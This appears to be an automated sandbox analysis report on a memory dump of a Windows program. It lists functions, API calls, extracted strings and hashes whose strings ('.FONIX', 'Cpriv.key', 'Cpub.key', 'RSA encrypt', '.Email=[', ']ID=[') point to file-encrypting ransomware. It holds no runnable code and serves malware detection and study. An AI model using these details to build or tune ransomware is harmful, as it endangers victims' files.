Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskCopyFile
String ID: Input error $ Output error $ rename error $.Email=[$0@@$0i@$::::$C:\ProgramData$Cpriv.key$Cpub.key$\Cpriv.key$\Cpub.key$].FONIX$]ID=[$copy to path $zip file
API String ID: 2758439042-609211741
Opcode ID: bf65cfaf7007e839c4bc3cab3f355a5f25100a37f38a144bd413d20d9a4764dc
Instruction ID: bb7306a199b240908fd7d74f786ba1406cc3e7d61a2d431b755074cfdbdfbec1
Opcode Fuzzy Hash: bf65cfaf7007e839c4bc3cab3f355a5f25100a37f38a144bd413d20d9a4764dc
Instruction Fuzzy Hash: 12F26672610BC189EB20DF29D8943DD33A5F795B9CF80422ADA5D5BBA9EF74C685C300

Uniqueness

Uniqueness Score: -1.00%

Function 013BCAD0, Relevance: 46.7, APIs: 17, Strings: 9, Instructions: 1203COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BE070
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BE076
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BE082
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BE088
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BE08E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BE094
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BE09A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BE0A0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BE0A6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BE0AC
Concurrency::cancel_current_task.LIBCPMT ref: 013BE0B2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BE0B8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BE0BE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BE0C4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BE0CA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BE0D0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013BE0D6

Part of subcall function 013DE5E0: Concurrency::cancel_current_task.LIBCPMT ref: 013DE781
Part of subcall function 013DE5E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 013DE78D

Strings

Input error , xrefs: 013BD020
.Email=[, xrefs: 013BCB52
]ID=[, xrefs: 013BCC63, 013BCC89
rename error , xrefs: 013BCF8B
0@@, xrefs: 013BE03A
0i@, xrefs: 013BD297, 013BDEC6
].XINOF, xrefs: 013BCD8E
Output error , xrefs: 013BDAD2
::::, xrefs: 013BDB88, 013BDBCB

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID: Input error $ Output error $ rename error $.Email=[$0@@$0i@$::::$].XINOF$]ID=[
API String ID: 3936042273-1480233951
Opcode ID: 5d8f0a6de1aad41c6901111e739deffc919c9d75bd8626f30affad90b21dfc68
Instruction ID: 7461f53b8c8cb4e5fe62befbc3f9f735d95ba30bd0eed737a1f9c8fb803cc196
Opcode Fuzzy Hash: 5d8f0a6de1aad41c6901111e739deffc919c9d75bd8626f30affad90b21dfc68
Instruction Fuzzy Hash: 05C24562611BC589EB20DF69D8943DD37A5F795B9CF809226CB5D4BBA8EF74C284C300

Uniqueness

Uniqueness Score: -1.00%

Function 013B6D20, Relevance: 28.8, APIs: 10, Strings: 6, Instructions: 834COMMON

Download Yara Rule

APIs

Part of subcall function 014089F0: CryptGenRandom.ADVAPI32 ref: 01408A7C
Part of subcall function 014089F0: CryptReleaseContext.ADVAPI32 ref: 01408A97

Part of subcall function 013E52C0: __std_exception_copy.LIBVCRUNTIME ref: 013E53BD

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B7C7C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B7C82
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B7C88
Concurrency::cancel_current_task.LIBCPMT ref: 013B7C8E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B7C94
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B7C9A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B7CA6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B7CAC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B7CB2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B7CB8

Strings

}B, xrefs: 013B6F87
Cpriv.key, xrefs: 013B70EC, 013B7396, 013B7707
Cpub.key, xrefs: 013B72AA
keygen , xrefs: 013B6D60
0@@, xrefs: 013B6E6C, 013B7026, 013B7B5A
0i@, xrefs: 013B6F33, 013B7B87

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Crypt$Concurrency::cancel_current_taskContextRandomRelease__std_exception_copy
String ID: 0@@$0i@$Cpriv.key$Cpub.key$keygen $}B
API String ID: 1243268891-1473054378
Opcode ID: a8b313f0b6b4f65efe8762600aa773f892ffd2075aa3030ed5cbea1414e69d47
Instruction ID: b2cda9122bb4d64d0881b574dcabfc14410de3b104a3e4617a93f68c712c3633
Opcode Fuzzy Hash: a8b313f0b6b4f65efe8762600aa773f892ffd2075aa3030ed5cbea1414e69d47
Instruction Fuzzy Hash: 72926B32620BC189EB20DF68E8943DD37A5F7A579CF50561ADB9D47AA8EF74C284C700

Uniqueness

Uniqueness Score: -1.00%

Function 0146A32C, Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1208COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 0146A375
_invalid_parameter_noinfo.LIBCMT ref: 0146A980
_invalid_parameter_noinfo.LIBCMT ref: 0146AB43
_invalid_parameter_noinfo.LIBCMT ref: 0146AD4A
_invalid_parameter_noinfo.LIBCMT ref: 0146B00E
_invalid_parameter_noinfo.LIBCMT ref: 0146B209
memcpy_s.LIBCPMT ref: 0146B2F7
memcpy_s.LIBCPMT ref: 0146B3A2
memcpy_s.LIBCPMT ref: 0146B46B

Strings

1#QNAN, xrefs: 0146B523
1#IND, xrefs: 0146B511
1#INF, xrefs: 0146B53F
1#SNAN, xrefs: 0146B51A

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: bbc0a7f1982b965052644d636cfcd8303344bc1bd3e4c4d0990a8343e63ba45b
Instruction ID: 07ad1324162b3bb7b24d962e1341b234ad2413b7ba18383080b4d4292f7a7297
Opcode Fuzzy Hash: bbc0a7f1982b965052644d636cfcd8303344bc1bd3e4c4d0990a8343e63ba45b
Instruction Fuzzy Hash: 3AA213B27006918BD729CF69D540BEE3BA9F39878CF50512BDB06A7B68DB34C541CB02

Uniqueness

Uniqueness Score: -1.00%

Function 01408330, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 323COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0140836F

Part of subcall function 013DE300: Concurrency::cancel_current_task.LIBCPMT ref: 013DE480
Part of subcall function 013DE300: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 013DE486

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 014087C3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 014087C9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 014087CF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 014087D5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 014087DB

Strings

OS_Rng: , xrefs: 014083FB
OS_Rng: , xrefs: 014083DD
operation failed with error , xrefs: 014084A8, 014084CA

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskErrorLast
String ID: operation failed with error $OS_Rng: $OS_Rng:
API String ID: 2277578949-1042714665
Opcode ID: 9767cd4651a78d62a5a0540da29f016a641e7c284f7da63bcb151b662d25e6f1
Instruction ID: 15a42f4abc59f743ebb80dc47969f388d66d70df49f90a78cea35c5d5e05cc1e
Opcode Fuzzy Hash: 9767cd4651a78d62a5a0540da29f016a641e7c284f7da63bcb151b662d25e6f1
Instruction Fuzzy Hash: 04D17972B10B818AEB00CBBAD54479D3772E758B98F508626CF5D17BA9EF78C195C380

Uniqueness

Uniqueness Score: -1.00%

Function 014081C0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020,01408A69), ref: 014081FC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020,01408A69), ref: 01408206
CryptAcquireContextA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020,01408A69), ref: 01408229
CryptAcquireContextA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020,01408A69), ref: 0140824C
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020,01408A69), ref: 0140827C
__std_exception_copy.LIBVCRUNTIME ref: 014082ED

Strings

(, xrefs: 01408233
CryptAcquireContext, xrefs: 01408282
Crypto++ RNG, xrefs: 0140821F, 01408242

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AcquireContextCrypt$ErrorLast$__std_exception_copy
String ID: ($CryptAcquireContext$Crypto++ RNG
API String ID: 3252210402-440840224
Opcode ID: 4cc05c818993af60cfe008e05c031d14da04e8edd3601ec96c66c06b2b5ea332
Instruction ID: 0033566871272b01d5cc3193387dfe1a9c9f61b2b44717e846dd67fd0b043c29
Opcode Fuzzy Hash: 4cc05c818993af60cfe008e05c031d14da04e8edd3601ec96c66c06b2b5ea332
Instruction Fuzzy Hash: 2631B072724B8192EB10DF65F95079A7361FB98B88F809026DA8D47774EF7CC199C700

Uniqueness

Uniqueness Score: -1.00%

Function 013B13F0, Relevance: 15.2, Strings: 12, Instructions: 225COMMON

Download Yara Rule

Strings

ntel, xrefs: 0141B626
aurH, xrefs: 0141B730
cAMD, xrefs: 0141B6CD
enti, xrefs: 0141B6D6
ineI, xrefs: 0141B633
Auth, xrefs: 0141B6C4
auls, xrefs: 0141B723
Hygo, xrefs: 0141B6DE
uine, xrefs: 0141B6E7
nGen, xrefs: 0141B6F0
Cent, xrefs: 0141B716
Genu, xrefs: 0141B619

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: Auth$Cent$Genu$Hygo$auls$aurH$cAMD$enti$ineI$nGen$ntel$uine
API String ID: 0-2607262942
Opcode ID: 6a75053edd0453b06b4f15a008eed29c55967ab0bb9706326992721112805b11
Instruction ID: 621862d2bb38032b156ffa7dbf2a4f5e42da871927a235a0e92b456c60551473
Opcode Fuzzy Hash: 6a75053edd0453b06b4f15a008eed29c55967ab0bb9706326992721112805b11
Instruction Fuzzy Hash: 2281E532A192518AFF16CF7DA9413ED2FB1A325348F68852FD95693B7AC6388441CB12

Uniqueness

Uniqueness Score: -1.00%

Function 014697CC, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 171COMMON

Download Yara Rule

APIs

Part of subcall function 0145CB68: GetLastError.KERNEL32(?,?,?,0144CA43,?,?,00000000,0145325C), ref: 0145CB77
Part of subcall function 0145CB68: SetLastError.KERNEL32(?,?,?,0144CA43,?,?,00000000,0145325C), ref: 0145CC15

EnumSystemLocalesW.KERNEL32(?,00000000,00000092,?,?,00000000,?,01459969), ref: 01469923
GetUserDefaultLCID.KERNEL32(?,00000000,00000092,?), ref: 0146993C
ProcessCodePage.LIBCMT ref: 01469966
IsValidCodePage.KERNEL32 ref: 01469978
IsValidLocale.KERNEL32 ref: 0146998E
GetLocaleInfoW.KERNEL32 ref: 014699EA
GetLocaleInfoW.KERNEL32 ref: 01469A06

Strings

x!N, xrefs: 014698A4

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
String ID: x!N
API String ID: 3939093798-3092814222
Opcode ID: 322149fdfa4c9d9e7beeb6a1f2be0c9bdd331b302651af6d6dfbbef7427041e6
Instruction ID: d18931a57cf8ae436e2edb11cad7d90ab32772ea6d0f3ed64d6bd703893f2419
Opcode Fuzzy Hash: 322149fdfa4c9d9e7beeb6a1f2be0c9bdd331b302651af6d6dfbbef7427041e6
Instruction Fuzzy Hash: E7617B72B1074189EF159F65D8507ED37A8BB58B8CF48802BCF59537A4EBB8C449C352

Uniqueness

Uniqueness Score: -1.00%

Function 013E1A70, Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 683COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013E2002
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013E23DC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013E24B7

Strings

0, xrefs: 013E212E
0, xrefs: 013E1C96
0, xrefs: 013E1D38
0, xrefs: 013E20A8

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: 0$0$0$0
API String ID: 3668304517-3558443385
Opcode ID: 071c78674da53e605255af8b9ab23b12cff87775b7b94cd7d7c00f0a566e6bf6
Instruction ID: 4e10c114a6e5a5c54b7f3d3a0b9db0a85232633c137f630057bd215e4e470a2b
Opcode Fuzzy Hash: 071c78674da53e605255af8b9ab23b12cff87775b7b94cd7d7c00f0a566e6bf6
Instruction Fuzzy Hash: 4B42EF32714BA189EF21DB68E4483AE2BA5F78579CF445516DB8D17BD8CFB8C185CB00

Uniqueness

Uniqueness Score: -1.00%

Function 01468D98, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 222COMMON

Download Yara Rule

APIs

Part of subcall function 0145CB68: GetLastError.KERNEL32(?,?,?,0144CA43,?,?,00000000,0145325C), ref: 0145CB77
Part of subcall function 0145CB68: SetLastError.KERNEL32(?,?,?,0144CA43,?,?,00000000,0145325C), ref: 0145CC15

TranslateName.LIBCMT ref: 01468E05
TranslateName.LIBCMT ref: 01468E40
GetACP.KERNEL32(?,?,?,00000000,00000092,01459970), ref: 01468E85
IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,01459970), ref: 01468EAD

Strings

utf8, xrefs: 01468F91
x!N, xrefs: 01468E34

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastNameTranslate$CodePageValid
String ID: utf8$x!N
API String ID: 2136749100-3187725136
Opcode ID: 52a136286bdef04a1ce08f6c6fd2f8bbb6ef781a3c0d22555bd61a7fd051d2cc
Instruction ID: 06238ebac48c98214579eb99df7d9dccca72c4d23ef89e0685823f5b3d2bbb20
Opcode Fuzzy Hash: 52a136286bdef04a1ce08f6c6fd2f8bbb6ef781a3c0d22555bd61a7fd051d2cc
Instruction Fuzzy Hash: 1881E27230074286EB249F26D8507AE3769F7A8B88F448527CF4987775DF79C691C702

Uniqueness

Uniqueness Score: -1.00%

Function 013B5CD0, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 407COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013E2002

Part of subcall function 013E52C0: __std_exception_copy.LIBVCRUNTIME ref: 013E53BD

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013E23DC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013E24B7

Strings

0, xrefs: 013E212E
0, xrefs: 013E1C96
0, xrefs: 013E1D38
0, xrefs: 013E20A8

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: 0$0$0$0
API String ID: 1944019136-3558443385
Opcode ID: 7165713f4d1fce24a4f184dacf5e1b8d521cf2a8c662e9f2ef11cf6672d592f4
Instruction ID: 7d2a01ce65ecedfde92456e97006f029bf5f6d6aa75b13d0e1aa90ec579884d7
Opcode Fuzzy Hash: 7165713f4d1fce24a4f184dacf5e1b8d521cf2a8c662e9f2ef11cf6672d592f4
Instruction Fuzzy Hash: AE029B32614BA199EB11CBB8E4883DE2BA5F79579CF440516DB8D17BD8CFB8C189C740

Uniqueness

Uniqueness Score: -1.00%

Function 014517F8, Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 01451871
RtlLookupFunctionEntry.KERNEL32 ref: 01451889
RtlVirtualUnwind.KERNEL32 ref: 014518C4
IsDebuggerPresent.KERNEL32 ref: 014518FD
SetUnhandledExceptionFilter.KERNEL32 ref: 01451907
UnhandledExceptionFilter.KERNEL32 ref: 01451912

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 9c7d7413b75d6e1d2bad21b2e3c4102e9cd8b38a6ba681b17cb5f58c4d708b9e
Instruction ID: dcb3f943df80cfcbbafea11d86a4cfd921c61a538fb462c5e3542198832705b2
Opcode Fuzzy Hash: 9c7d7413b75d6e1d2bad21b2e3c4102e9cd8b38a6ba681b17cb5f58c4d708b9e
Instruction Fuzzy Hash: EC315C36614F8086DB60CF65E84079E77A4F788B98F50052AEE9D47BA8DF38C156CB00

Uniqueness

Uniqueness Score: -1.00%

Function 013B84A0, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 268COMMON

Download Yara Rule

Strings

RSA encrypt , xrefs: 013B84E3
pS@, xrefs: 013B8851
0@@, xrefs: 013B860C, 013B89AA
0i@, xrefs: 013B855A, 013B88D2

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Concurrency::cancel_current_taskCrypt$ContextRandomRelease__std_exception_copy
String ID: 0@@$0i@$RSA encrypt $pS@
API String ID: 2147088305-3153535020
Opcode ID: 090a43d6a9441d281f8ef0b2643173a557fbe406ccf5ae8681fb897778b9c9a9
Instruction ID: 93e782db32541adfcebd3a4bcbce2dd411b365b29059a5f3ca47d968caa97efd
Opcode Fuzzy Hash: 090a43d6a9441d281f8ef0b2643173a557fbe406ccf5ae8681fb897778b9c9a9
Instruction Fuzzy Hash: E9D13C32A25BC586D761CB25E8903EAB3A4F7E9748F419226DBCD42B25EF78D1D4C700

Uniqueness

Uniqueness Score: -1.00%

Function 0145DCC4, Relevance: 7.8, APIs: 5, Instructions: 321fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 0145DD33
WriteFile.KERNEL32 ref: 0145DFDD
WriteFile.KERNEL32 ref: 0145E02F
GetLastError.KERNEL32 ref: 0145E171
GetLastError.KERNEL32 ref: 0145E183

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorFileLastWrite$Console
String ID:
API String ID: 786612050-0
Opcode ID: 0bc133803e873f8da5980d669978cbf25112b4e5320b6552e80caed4136a50ea
Instruction ID: 6f4f9b83e7f3f0aac7ffa73a49fcc660fd91d8c8b20ceff9fc64f57b7b8c3c00
Opcode Fuzzy Hash: 0bc133803e873f8da5980d669978cbf25112b4e5320b6552e80caed4136a50ea
Instruction Fuzzy Hash: 6ED1E272B08A809AE701CFA9D5802DEBBB1F749BD8F544116DF8E57B69DA34C15AC340

Uniqueness

Uniqueness Score: -1.00%

Function 01421FE8, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 01422049
IsDebuggerPresent.KERNEL32 ref: 01422061
OutputDebugStringW.KERNEL32 ref: 01422072

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0142206B

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DebugDebuggerErrorLastOutputPresentString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 389471666-631824599
Opcode ID: 37cdb910294e2a64cb332445ddb9195b38fe16903487e6a3caed2fcd73a443d1
Instruction ID: cada2bea90e7c57bab0f3525950577572a655ef42dfa0dbb0e4341cb5b8e5bf8
Opcode Fuzzy Hash: 37cdb910294e2a64cb332445ddb9195b38fe16903487e6a3caed2fcd73a443d1
Instruction Fuzzy Hash: C511AD32320B91A7F7459B26EA983A933A1FB44355F80412ACB4983A60EF7CD0B8C700

Uniqueness

Uniqueness Score: -1.00%

Function 013E2700, Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 559COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013E2CC5

Strings

RoundUpToMultipleOf: integer overflow, xrefs: 013E2910

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: RoundUpToMultipleOf: integer overflow
API String ID: 3668304517-1120416164
Opcode ID: ab660e8f2ba196fa4c60d40e8f1443d615451c1f2a3eb3b9dbbe8d09616d9ac4
Instruction ID: c297f94a28c5c25b25b8b7577033a41c0bcffc7bbfff6b88445317689a0e3273
Opcode Fuzzy Hash: ab660e8f2ba196fa4c60d40e8f1443d615451c1f2a3eb3b9dbbe8d09616d9ac4
Instruction Fuzzy Hash: 9032BE33324B818ADB20DF6AE8547DE77A1F798798F445216EA9D43BA8DF78C509C700

Uniqueness

Uniqueness Score: -1.00%

Function 014556B4, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 208COMMON

Download Yara Rule

APIs

_Wcsftime.LIBCMT ref: 01455766
_Wcsftime.LIBCMT ref: 01455707

Part of subcall function 01459CA0: _invalid_parameter_noinfo.LIBCMT ref: 01459CCB

Strings

